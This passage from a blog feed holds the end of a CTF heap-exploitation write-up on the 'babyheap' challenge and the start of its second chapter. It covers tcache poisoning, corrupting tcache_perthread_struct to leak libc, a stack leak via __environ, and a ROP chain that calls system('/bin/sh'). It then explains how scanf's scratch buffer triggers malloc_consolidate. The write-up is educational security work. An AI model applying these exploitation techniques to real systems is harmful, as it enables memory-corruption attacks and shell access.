&lt;p&gt;As explained in the heap primer, the heads of the linked lists for &lt;code&gt;smallbin&lt;/code&gt;, &lt;code&gt;largebin&lt;/code&gt;, and &lt;code&gt;unsortedbin&lt;/code&gt; live in &lt;code&gt;main_arena&lt;/code&gt; inside libc. Those lists are doubly linked and circular. If we can move a chunk into one of those bins we can read the &lt;code&gt;fd&lt;/code&gt; pointer that points back into libc and obtain a libc leak usable later.&lt;/p&gt;
&lt;p&gt;Sending a chunk into those bins requires freeing a large enough chunk. The tcache holds chunks up to size &lt;code&gt;0x410&lt;/code&gt; (inclusive), so we must either free a single chunk larger than &lt;code&gt;0x410&lt;/code&gt; or free more than seven smaller chunks that are too big for the fastbins (above 0x80 bytes). We will go for the first option and free a chunk larger than 0x410 bytes.&lt;/p&gt;
&lt;h3&gt;Reasoning about chunks&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Question&lt;/strong&gt;: By manipulating a chunk’s fd pointer (tcache poisoning) to position the next chunk in the tcache list just above a previously allocated third chunk, is it possible to use the first chunk to alter the size metadata of the second chunk, so that when the third chunk is freed, the allocator interprets its size as 0x420 bytes and moves the chunk into unsortedbin?&lt;/p&gt;
&lt;p&gt;In theory, &lt;strong&gt;yes&lt;/strong&gt;, but with important caveats. We must have a second chunk immediately after our forged chunk (taking its modified size into account), so that when we free the giant chunk it doesn&apos;t get trimmed away.&lt;br /&gt;
Targeting a 0x420 size will cross past the current top chunk, so we need to allocate enough intermediate chunks until our &lt;em&gt;guard chunk&lt;/em&gt; (the second chunk mentioned before) sits directly after our forged chunk. Only then can freeing the forged chunk make the allocator interpret a 0x420 size and move the chunk to unsortedbin instead of trimming it away, producing the desired libc leak.&lt;/p&gt;
&lt;p&gt;To guarantee that an extra chunk is placed immediately behind our forged &lt;code&gt;0x420&lt;/code&gt; chunk we expand the forged size slightly to &lt;code&gt;0x440&lt;/code&gt;. Because small chunks are &lt;code&gt;0x40&lt;/code&gt; bytes, the &lt;code&gt;0x440&lt;/code&gt; size ensures the forged chunk completely overlaps the final small chunk in that region.&lt;/p&gt;
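&lt;p&gt;The choice of &lt;code&gt;0x440&lt;/code&gt; over &lt;code&gt;0x420&lt;/code&gt; comes down to plain arithmetic on 0x40-byte chunks. The check below is one reading of the paragraph above, not output from the exploit, and the constant name is made up:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SMALL_CHUNK = 0x40  # malloc(0x30) plus the 0x10 header

for forged in (0x420, 0x440):
    whole, leftover = divmod(forged, SMALL_CHUNK)
    # leftover != 0 means the forged chunk would end in the middle of a small chunk
    print(hex(forged), whole, hex(leftover))
# 0x420 16 0x20
# 0x440 17 0x0
&lt;/code&gt;&lt;/pre&gt;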
&lt;p&gt;&lt;img src=&quot;./images/writeup-001-3.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;But it&apos;s not so simple: with 19 allocations we don&apos;t have enough chunks to push the top chunk behind our forged one and still have allocations left for the tcache poisoning needed in the final exploit. We need another strategy.&lt;/p&gt;
&lt;h3&gt;tcache_perthread_struct&lt;/h3&gt;
&lt;p&gt;The tcache has a significant property that the other bins don&apos;t have: it is local to a specific thread, so if the process has more threads, more tcaches are created. To make this work, every thread gets its own struct called &lt;code&gt;tcache_perthread_struct&lt;/code&gt;, which contains the heads of the linked lists and the number of freed chunks in each. For our primary thread, the 0x290-byte chunk holding this struct is the very first chunk on the heap.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42/source/malloc/malloc.c#L3127
typedef struct tcache_perthread_struct
{
  uint16_t num_slots[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
&lt;/code&gt;&lt;/pre&gt;
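&lt;p&gt;The 0x290 figure can be derived from this definition. A minimal sketch, assuming a 64-bit target and &lt;code&gt;TCACHE_MAX_BINS&lt;/code&gt; equal to 64, which is the value that matches the 0x290 chunk seen in this challenge (other glibc versions may use a different bin count or counter width):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TCACHE_MAX_BINS = 64  # assumption, see the note above
COUNTER_SIZE = 2      # sizeof(uint16_t)
POINTER_SIZE = 8      # sizeof(tcache_entry *) on x86-64
CHUNK_HEADER = 0x10   # prev_size and size fields in front of the struct

struct_size = TCACHE_MAX_BINS * (COUNTER_SIZE + POINTER_SIZE)
chunk_size = struct_size + CHUNK_HEADER
print(hex(struct_size), hex(chunk_size))  # 0x280 0x290

# The counters come first and occupy this many bytes of the user data
counters_size = TCACHE_MAX_BINS * COUNTER_SIZE
print(hex(counters_size))  # 0x80
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Under these assumptions the first 0x80 bytes of the struct are the per-size counters, so a 0x40 chunk overlapping the start of the struct lands entirely on them.&lt;/p&gt;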
&lt;p&gt;By using the &lt;code&gt;heap&lt;/code&gt; command in pwndbg we can spot the perthread chunk (the first one); the second one is a 0x40 chunk created through the menu of the program and the last one is the top chunk:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-001-4.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So, could we use this chunk as our forged chunk?&lt;/strong&gt;&lt;br /&gt;
Yes. Even though we never directly allocated this chunk and thus did not receive its pointer, we can still allocate a new chunk that completely overlaps the first 0x40 bytes of the &lt;code&gt;perthread_struct&lt;/code&gt;. From there, we can modify its size field using a slightly overlapping chunk, just like the technique described earlier. By adding new chunks the allocator will place them after the 0x290 perthread_chunk like in the image above.&lt;/p&gt;
&lt;p&gt;This approach significantly reduces the number of required allocations to correctly position the guard chunk, from 16 allocations (excluding the guard and the two overlapping chunks) down to just 6.&lt;/p&gt;
&lt;p&gt;The main drawback is that the &lt;code&gt;perthread_struct&lt;/code&gt; becomes corrupted, breaking the tcache metadata: in particular, the chunk counts stored at the beginning of the struct get zeroed out by the allocation and filled with other values on deallocation. Nevertheless, this appears to be our only viable option for obtaining a chunk large enough for the intended purpose.&lt;/p&gt;
&lt;h3&gt;You are 0x440 bytes big, trust me&lt;/h3&gt;
&lt;p&gt;Talk is cheap, so let’s move to the practical part.&lt;br /&gt;
We’ll use &lt;strong&gt;tcache poisoning&lt;/strong&gt; to place a chunk precisely at the location of the &lt;code&gt;perthread_chunk&lt;/code&gt;, so that the deallocator will mistake the size of the perthread chunk for the size of our own chunk. Then, we allocate a second chunk and poison the tcache again so that it partially overlaps the &lt;code&gt;perthread&lt;/code&gt;/fake-chunk metadata. This overlapping chunk gives us write access to the &lt;code&gt;perthread&lt;/code&gt; metadata, allowing us to modify its size field from &lt;code&gt;0x290&lt;/code&gt; to &lt;code&gt;0x440&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Next, we allocate enough chunks to push the &lt;code&gt;top&lt;/code&gt; chunk downward, six allocations plus the guard chunk.&lt;br /&gt;
By looking at the addresses of the chunks in the image below we can notice the modified &lt;code&gt;perthread&lt;/code&gt; chunk with the guard chunk right beneath it.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-002-1.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Finally, we free the chunk placed over the &lt;code&gt;perthread&lt;/code&gt; structure. The deallocator checks the size and moves the chunk to the &lt;strong&gt;unsorted bin&lt;/strong&gt;. During this process, &lt;code&gt;fd&lt;/code&gt; (forward) and &lt;code&gt;bk&lt;/code&gt; (backward) pointers are written into the freed chunk; these pointers reference &lt;code&gt;main_arena&lt;/code&gt;. Reading from the freed chunk’s user area thus reveals a &lt;strong&gt;libc pointer leak&lt;/strong&gt;!&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-003-1.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;ROP exploit using &lt;code&gt;__environ&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Once we have arbitrary read and write inside libc, getting a stack leak is very simple: enter &lt;code&gt;__environ&lt;/code&gt;.&lt;/p&gt;
&lt;h4&gt;The __environ variable&lt;/h4&gt;
&lt;p&gt;:::note
Yes, here&apos;s a joke about &lt;code&gt;__environ&lt;/code&gt;:
&lt;code&gt;__environ&lt;/code&gt; goes to therapy. Talks nonstop for hours.
Then it asks, “Why always me?”&lt;br /&gt;
Therapist responds, “It all comes from your environment.”
:::
&lt;code&gt;__environ&lt;/code&gt; is a global variable pointing to the environment variables saved on the stack:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;environ = libc_base + libc.symbols.__environ
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;The ROP chain&lt;/h4&gt;
&lt;p&gt;We can use &lt;strong&gt;tcache poisoning&lt;/strong&gt; to overwrite the &lt;code&gt;fd&lt;/code&gt; pointer of the first freed chunk with the address of &lt;code&gt;__environ&lt;/code&gt;. After allocating twice, the second allocation will return a chunk overlapping the &lt;code&gt;__environ&lt;/code&gt; pointer.&lt;/p&gt;
&lt;p&gt;Keep in mind: &lt;code&gt;malloc()&lt;/code&gt; zeroes out the first &lt;code&gt;0x10&lt;/code&gt; bytes, so we must allocate at an &lt;strong&gt;offset&lt;/strong&gt;. In this case, we offset by &lt;code&gt;0x18&lt;/code&gt; because chunks must also be aligned to &lt;code&gt;0x10&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;environ_leak = u64(read(r, 10)[0x18:0x20])
&lt;/code&gt;&lt;/pre&gt;
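&lt;p&gt;The offset arithmetic can be checked in isolation. In this sketch the address of &lt;code&gt;__environ&lt;/code&gt; is made up (the real one comes from the libc leak); the only assumption taken from the text is that it ends in 8, so that stepping back &lt;code&gt;0x18&lt;/code&gt; bytes gives a 0x10-aligned chunk.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;environ_addr = 0x7FFFF7E0AD58  # hypothetical address of __environ in libc

target = environ_addr - 0x18   # where the poisoned tcache entry should point
assert target % 0x10 == 0      # tcache entries have to be 0x10-aligned

# __environ then lives at bytes 0x18..0x20 of the returned chunk
start = environ_addr - target
print(hex(target), hex(start), hex(start + 8))  # 0x7ffff7e0ad40 0x18 0x20
&lt;/code&gt;&lt;/pre&gt;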
&lt;p&gt;In the debugger, we take this leaked stack address and subtract the address where the return address of &lt;code&gt;main&lt;/code&gt; is stored. The difference is a constant offset, so subtracting it from our environ leak at runtime yields the location of that return address.&lt;/p&gt;
&lt;p&gt;Using our &lt;strong&gt;tcache poisoning technique&lt;/strong&gt; again, we can overwrite the return address with a ROP chain. I opted for:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pop_rdi = libc_base + 0x000000000010f75b
binsh = libc.binsh() + libc_base
ret = pop_rdi + 1
system = libc_base + libc.symbols.system

return_pointer = environ_leak - 0x130 # 0x130 is the offset from environ to main return
update(r, 9, p64((return_pointer-0x08) ^ mask)) # 0x08 for heap alignment
create(r, 11, b&quot;dummy&quot;)
create(r, 12, p64(0) + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system))

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We need to add a single &lt;code&gt;ret&lt;/code&gt; instruction because the stack is not aligned to a multiple of &lt;code&gt;0x10&lt;/code&gt;. Adding 1 to the address of the &lt;code&gt;pop rdi; ret&lt;/code&gt; gadget gives us a lone &lt;code&gt;ret&lt;/code&gt;, because &lt;code&gt;pop rdi&lt;/code&gt; is encoded as a single byte.&lt;/p&gt;
&lt;p&gt;:::note
Sometimes a perfect ROP chain still crashes the target. One common cause is stack misalignment: many &lt;code&gt;libc&lt;/code&gt; functions require the stack to be &lt;code&gt;0x10&lt;/code&gt; aligned to accommodate &lt;a href=&quot;https://stackoverflow.com/questions/1422149/what-is-vectorization#1422181&quot;&gt;SIMD instructions&lt;/a&gt;. Adding a single &lt;code&gt;ret&lt;/code&gt; gadget to the chain shifts the stack by &lt;code&gt;0x08&lt;/code&gt;, fixing the alignment.
:::&lt;/p&gt;
&lt;p&gt;Now, when &lt;code&gt;main&lt;/code&gt; returns, &lt;code&gt;system(&quot;/bin/sh&quot;)&lt;/code&gt; is executed, giving us a &lt;strong&gt;shell&lt;/strong&gt;.&lt;/p&gt;
</content:encoded><author>David Hermes</author></item><item><title>Babyheap: JustCTF - Chapter 2</title><link>https://blog.davidherm.es/posts/babyheap_2</link><guid isPermaLink="true">https://blog.davidherm.es/posts/babyheap_2</guid><description>continuation of the babyheap writeup focusing on exit_func overwrite and scanf trickery.</description><pubDate>Tue, 21 Oct 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Let&apos;s tackle the next chapter of babyheap, this one is a bit more exotic...&lt;/p&gt;
&lt;h2&gt;scanf and black magic&lt;/h2&gt;
&lt;p&gt;Let’s examine the menu’s &lt;code&gt;scanf&lt;/code&gt; input function.&lt;br /&gt;
&lt;strong&gt;Question:&lt;/strong&gt; how can you send it an arbitrarily long number without triggering a buffer overflow?&lt;br /&gt;
&lt;strong&gt;Answer:&lt;/strong&gt; it uses the heap.&lt;/p&gt;
&lt;h3&gt;Ocean of scanf&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;//babyheap main function
printf(&quot;Menu:\n1) Create\n2) Read\n3) Update\n4) Delete\n0) Quit\n&amp;gt; &quot;);
if ( (unsigned int)__isoc99_scanf(&quot; %d&quot;, &amp;amp;v4) != 1 )
{
	puts(&quot;Invalid input&quot;);
	exit(0);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But if &lt;code&gt;scanf()&lt;/code&gt; always uses the heap then why don&apos;t we see tcache chunks in the free list after every execution? To understand what is going on, let&apos;s start &lt;code&gt;gdb&lt;/code&gt; and set a breakpoint at &lt;code&gt;*malloc&lt;/code&gt;.
If we send 42 to scanf, malloc doesn&apos;t get called, but when we send a very big number, the program breaks at a malloc call! Using &lt;code&gt;finish&lt;/code&gt; we can exit the malloc call and see the function that executes it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   0x7ffff7ca9a3b &amp;lt;__GI___libc_scratch_buffer_grow_preserve+107&amp;gt;:       call   QWORD PTR [rip+0x15f597]        # 0x7ffff7e08fd8 (malloc)
=&amp;gt; 0x7ffff7ca9a41 &amp;lt;__GI___libc_scratch_buffer_grow_preserve+113&amp;gt;:       mov    rdi,rax
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;__libc_scratch_buffer_grow_preserve()&lt;/code&gt; is our perpetrator then, but let&apos;s step back and follow the implementation of &lt;code&gt;vfscanf()&lt;/code&gt;. After &lt;code&gt;vfscanf()&lt;/code&gt; parses the &quot;%d&quot; conversion, it enters a loop: on every iteration it stores the current character in a &lt;em&gt;charbuffer&lt;/em&gt; by calling &lt;code&gt;char_buffer_add()&lt;/code&gt; and fetches the next one from stdin with &lt;code&gt;inchar()&lt;/code&gt;, until EOF is reached or the field width drops to zero.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1823

while (c != EOF &amp;amp;&amp;amp; width != 0)
{
	... a LOT of stuff ...	
	
	char_buffer_add (&amp;amp;charbuf, c); // &amp;lt;-- wrapper around a wrapper around grow_preserve
	if (width &amp;gt; 0)
		--width;

	c = inchar ();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It then appends a null byte to terminate the collected digits and calls &lt;code&gt;__strtol_internal&lt;/code&gt;, which converts the string into a &lt;strong&gt;long integer&lt;/strong&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1932

/* Convert the number.  */
char_buffer_add (&amp;amp;charbuf, L_(&apos;\0&apos;));
if (char_buffer_error (&amp;amp;charbuf))
{
  ... error stuff ...
}
if (need_longlong &amp;amp;&amp;amp; (flags &amp;amp; LONGDBL))
{
  ... if a longlong is needed stuff ...
}
else
{
  if (flags &amp;amp; NUMBER_SIGNED)
    num.l = __strtol_internal                                  //&amp;lt;-- HERE
      (char_buffer_start (&amp;amp;charbuf), &amp;amp;tw, base, flags &amp;amp; GROUP);
  else
    num.ul = __strtoul_internal
      (char_buffer_start (&amp;amp;charbuf), &amp;amp;tw, base, flags &amp;amp; GROUP);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But didn&apos;t we ask for an &lt;code&gt;int&lt;/code&gt; with &quot;%d&quot;? Why is the string converted into a long integer? Don&apos;t worry: shortly after the code above, the number is cast to the requested type and stored through the pointer argument given to &lt;code&gt;scanf()&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1961
 
if (!(flags &amp;amp; SUPPRESS))
{
	if (flags &amp;amp; NUMBER_SIGNED)
	{
	  if (need_longlong &amp;amp;&amp;amp; (flags &amp;amp; LONGDBL))
		*ARG (LONGLONG int *) = num.q;
	  else if (need_long &amp;amp;&amp;amp; (flags &amp;amp; LONG))
		*ARG (long int *) = num.l;
	  else if (flags &amp;amp; SHORT)
		*ARG (short int *) = (short int) num.l;
	  else if (!(flags &amp;amp; CHAR))
		*ARG (int *) = (int) num.l;                    //&amp;lt;-- long to int and stored in the
	  else                                             //    argument given to scanf
		*ARG (signed char *) = (signed char) num.ul;
	}
	else
	{
	  ... same as above but unsigned ...
	}
	
	... more stuff...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now we know how a number gets transformed into an integer. But we &lt;strong&gt;ignored a key aspect&lt;/strong&gt; of this code: &lt;code&gt;char_buffer_add&lt;/code&gt; moves characters from stdin into a buffer, so let&apos;s understand how the function works.
This function is a wrapper around &lt;code&gt;char_buffer_add_slow()&lt;/code&gt; which uses a &lt;strong&gt;scratch_buffer&lt;/strong&gt; to save data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/include/scratch_buffer.h#L66
struct scratch_buffer {
  void *data;    /* Pointer to the beginning of the scratch area.  */
  size_t length; /* Allocated space at the data pointer, in bytes.  */
  union { max_align_t __align; char __c[1024]; } __space;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This struct contains a &lt;strong&gt;pointer&lt;/strong&gt; to a writable buffer (&lt;code&gt;data&lt;/code&gt;), the &lt;strong&gt;length&lt;/strong&gt; of said buffer (&lt;code&gt;length&lt;/code&gt;), and a &lt;strong&gt;1024 byte memory area&lt;/strong&gt; embedded in the struct itself (&lt;code&gt;__space&lt;/code&gt;).
When the &lt;code&gt;scratch_buffer&lt;/code&gt; is initialized, &lt;code&gt;data&lt;/code&gt; is set to the address of this embedded area. If more than 1024 bytes must be stored, &lt;code&gt;char_buffer_add_slow()&lt;/code&gt; calls &lt;code&gt;__libc_scratch_buffer_grow_preserve()&lt;/code&gt;, which allocates a new buffer of twice the size on the heap, copies the old contents over, and updates &lt;code&gt;data&lt;/code&gt; and &lt;code&gt;length&lt;/code&gt;.
This is why malloc gets called only when big numbers are sent to &lt;code&gt;scanf&lt;/code&gt;: we need more than 1024 characters to trigger the heap allocation.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
bool
__libc_scratch_buffer_grow_preserve (struct scratch_buffer *buffer)
{
	size_t new_length = 2 * buffer-&amp;gt;length; // &amp;lt;-- 1024 * 2 on the first call
	void *new_ptr;
	
	if (buffer-&amp;gt;data == buffer-&amp;gt;__space.__c)
    {
	/* Move buffer to the heap.  No overflow is possible because
	buffer-&amp;gt;length describes a small buffer on the stack.  */
	new_ptr = malloc (new_length);                   //&amp;lt;-- the breakpoint hit here
	if (new_ptr == NULL)
		return false;
	memcpy (new_ptr, buffer-&amp;gt;__space.__c, buffer-&amp;gt;length);
    }
	else
    {
	/* Buffer was already on the heap.  Check for overflow.  */
	if (__glibc_likely (new_length &amp;gt;= buffer-&amp;gt;length))
		new_ptr = realloc (buffer-&amp;gt;data, new_length);
    else
	{
		... error stuff ...
	}

    if (__glibc_unlikely (new_ptr == NULL))
	{
		/* Deallocate, but buffer must remain valid to free.  */
		free (buffer-&amp;gt;data);
		scratch_buffer_init (buffer);
		return false;
	}
    }
    
	/* Install new heap-based buffer.  */
	buffer-&amp;gt;data = new_ptr;
	buffer-&amp;gt;length = new_length;
	return true;
}
&lt;/code&gt;&lt;/pre&gt;
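&lt;p&gt;To make the growth rule concrete, here is a small Python model of the sizes that end up being requested from the heap. It is only a sketch: &lt;code&gt;heap_requests&lt;/code&gt; is a made-up helper, and it assumes one byte per digit plus the terminating null byte, with the buffer doubling every time it runs full.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Hypothetical model of the scratch buffer growth, not glibc code.
INLINE_SIZE = 1024  # size of __space.__c inside struct scratch_buffer


def heap_requests(n_digits):
    # Bytes scanf has to buffer: the digits plus the trailing null byte (assumption).
    needed = n_digits + 1
    capacity = INLINE_SIZE
    requests = []
    while needed &amp;gt; capacity:
        capacity *= 2              # new_length = 2 * buffer-&amp;gt;length
        requests.append(capacity)  # size handed to malloc() or realloc()
    return requests


print(heap_requests(2))      # sending 42: []
print(heap_requests(0x500))  # sending 0x500 digits: [2048]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Short numbers never leave the embedded area, while anything longer than it causes at least one 2048 byte request.&lt;/p&gt;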
&lt;p&gt;Now we know in which situation &lt;code&gt;malloc&lt;/code&gt; gets called from &lt;code&gt;scanf&lt;/code&gt;, but how does this help us &lt;strong&gt;leak a libc pointer?&lt;/strong&gt; The scratch buffer is freed right after use, so how can this knowledge leave a freed chunk in the small or large bins? It seems that our deep dive is not finished yet... enter the depths of malloc.&lt;/p&gt;
&lt;h3&gt;Deep into malloc&lt;/h3&gt;
&lt;p&gt;Looking at the &lt;code&gt;malloc()&lt;/code&gt; implementation inside &lt;code&gt;libc&lt;/code&gt;, we notice that if the requested chunk is too large for the &lt;code&gt;smallbins&lt;/code&gt; and the fastbins are not empty, &lt;code&gt;malloc_consolidate()&lt;/code&gt; is called.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
static void *
_int_malloc (mstate av, size_t bytes)
{
	INTERNAL_SIZE_T nb;               /* normalized request size */
	
	... too much stuff here, like a loooot ...
	
	if (in_smallbin_range (nb))
	{
	    ... a bit of stuff here ...
	} 
    else
    {
	    /*
	     If this is a large request, consolidate fastbins before continuing.
	     While it might look excessive to kill all fastbins before
	     even seeing if there is space available, this avoids
	     fragmentation problems normally associated with fastbins.
	     [...]
		*/
		
	    idx = largebin_index (nb);
	    if (have_fastchunks (av))
        malloc_consolidate (av);     //&amp;lt;--- oh look, malloc_consolidate
    }
    
    ... a league of legends lootbox full of stuff here ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The macro &lt;code&gt;in_smallbin_range(nb)&lt;/code&gt; is a simple check that tells whether a chunk size is small enough for the smallbins. From the definitions below, &lt;code&gt;MIN_LARGE_SIZE&lt;/code&gt; evaluates to 64 * 16 = 0x400 on x86-64, so every chunk of size 0x400 or more counts as a large request.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
#define NBINS             128
#define NSMALLBINS         64
#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT /* normally 16 */
#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT &amp;gt; CHUNK_HDR_SZ)
#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)

#define in_smallbin_range(sz)  \
  ((unsigned long) (sz) &amp;lt; (unsigned long) MIN_LARGE_SIZE)
&lt;/code&gt;&lt;/pre&gt;
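&lt;p&gt;The arithmetic can be double-checked with a few lines of Python. This is a sketch that assumes the usual x86-64 values (&lt;code&gt;SIZE_SZ&lt;/code&gt; of 8, &lt;code&gt;MALLOC_ALIGNMENT&lt;/code&gt; of 16, &lt;code&gt;MINSIZE&lt;/code&gt; of 32); &lt;code&gt;request2size&lt;/code&gt; here is a simplified re-implementation of the glibc macro of the same name.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Assumed x86-64 constants, mirrored from the macros above.
SIZE_SZ = 8
MALLOC_ALIGNMENT = 2 * SIZE_SZ
CHUNK_HDR_SZ = 2 * SIZE_SZ
MINSIZE = 32
NSMALLBINS = 64
SMALLBIN_WIDTH = MALLOC_ALIGNMENT
SMALLBIN_CORRECTION = int(MALLOC_ALIGNMENT &amp;gt; CHUNK_HDR_SZ)
MIN_LARGE_SIZE = (NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH


def request2size(req):
    # Add the size field, then round up to the alignment (simplified).
    size = (req + SIZE_SZ + MALLOC_ALIGNMENT - 1) &amp;amp; ~(MALLOC_ALIGNMENT - 1)
    return max(size, MINSIZE)


def in_smallbin_range(size):
    return size &amp;lt; MIN_LARGE_SIZE


print(hex(MIN_LARGE_SIZE))                    # 0x400
print(hex(request2size(2048)))                # 0x810
print(in_smallbin_range(request2size(2048)))  # False
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Under these assumptions a 2048 byte request becomes a 0x810 byte chunk, which is clearly outside the smallbin range.&lt;/p&gt;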
&lt;p&gt;So what happens if we create a chunk bigger than 0x400 bytes? To answer that, we need to understand what &lt;code&gt;malloc_consolidate&lt;/code&gt; does.&lt;/p&gt;
&lt;p&gt;:::note
&lt;code&gt;malloc_consolidate()&lt;/code&gt; in glibc is a function that &lt;strong&gt;coalesces&lt;/strong&gt; small freed chunks from the fastbins and moves them into the &lt;strong&gt;unsortedbin&lt;/strong&gt;.
Normally, when a small chunk is freed and doesn&apos;t enter tcache, it goes into a fastbin without being merged with adjacent free chunks, which keeps &lt;code&gt;free()&lt;/code&gt; fast.
Over time, this can fragment memory, so when &lt;code&gt;malloc()&lt;/code&gt; serves a large request (a largebin-sized chunk, for example) it first calls &lt;code&gt;malloc_consolidate()&lt;/code&gt;.
:::&lt;/p&gt;
&lt;p&gt;This means that if we generate a fastbin chunk and trigger &lt;code&gt;malloc_consolidate&lt;/code&gt; in some way, the chunk leaves the fastbin and ends up in a &lt;strong&gt;smallbin&lt;/strong&gt;, whose doubly linked list is anchored inside libc. The chunk&apos;s &lt;code&gt;fd&lt;/code&gt; and &lt;code&gt;bk&lt;/code&gt; fields then hold libc addresses, so reading this chunk gives us a libc leak.
But as we discovered before, to execute &lt;code&gt;malloc_consolidate&lt;/code&gt; we need to request a chunk of size 0x400 or greater; this is where our scanf trick comes in handy.&lt;/p&gt;
&lt;h3&gt;Putting it all together&lt;/h3&gt;
&lt;p&gt;We start by generating eight chunks (7 tcache + 1 fastbin) and free them in a particular order to guarantee that the &lt;strong&gt;fastbin chunk&lt;/strong&gt; is &lt;strong&gt;not&lt;/strong&gt; the last one in heap memory. Otherwise, &lt;code&gt;malloc_consolidate&lt;/code&gt; would simply merge it into the top chunk.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-011.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Now we can apply what we learned about scanf and malloc: we need &lt;code&gt;scanf&lt;/code&gt; to request a heap buffer, and that request must be too big for the smallbins so that &lt;code&gt;malloc_consolidate&lt;/code&gt; runs.
To achieve this we can send &lt;code&gt;b&quot;1&quot;*0x500&lt;/code&gt; to &lt;code&gt;scanf&lt;/code&gt;. The 0x500 digits no longer fit into the 1024 byte (&lt;code&gt;0x400&lt;/code&gt;) scratch area, so &lt;code&gt;__libc_scratch_buffer_grow_preserve()&lt;/code&gt; requests 2048 bytes from &lt;code&gt;malloc&lt;/code&gt;, which is a large request and triggers &lt;code&gt;malloc_consolidate()&lt;/code&gt;. The &lt;strong&gt;fastbin&lt;/strong&gt; chunk gets moved to the &lt;strong&gt;unsortedbin&lt;/strong&gt; and has ended up in the &lt;strong&gt;smallbin&lt;/strong&gt; list by the time the big chunk is freed after &lt;code&gt;scanf&lt;/code&gt; returns.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-012.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;By using &lt;code&gt;chunk_read()&lt;/code&gt; on the first chunk we can leak the libc address!&lt;/p&gt;
&lt;h2&gt;Exploiting with exit_func overwrite&lt;/h2&gt;
&lt;p&gt;Looking at the &lt;code&gt;exit()&lt;/code&gt; function, we notice that it is only a wrapper around &lt;code&gt;__run_exit_handlers()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
void exit (int status)
{
  __run_exit_handlers (status, &amp;amp;__exit_funcs, true, true);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function executes so-called &lt;code&gt;exit_functions&lt;/code&gt; saved into the &lt;code&gt;__exit_funcs&lt;/code&gt; global structure. Exit functions can also be registered by the user using &lt;code&gt;atexit()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//example snippet
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;

void cleanup1(void) { puts(&quot;cleanup1&quot;); }
void cleanup2(void) { puts(&quot;cleanup2&quot;); }

int main(void) {
    atexit(cleanup1);
    atexit(cleanup2);
    printf(&quot;Exiting...\n&quot;);
    return 0; // triggers cleanup2 then cleanup1
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, what exactly is an &lt;em&gt;exit_function&lt;/em&gt;?&lt;br /&gt;
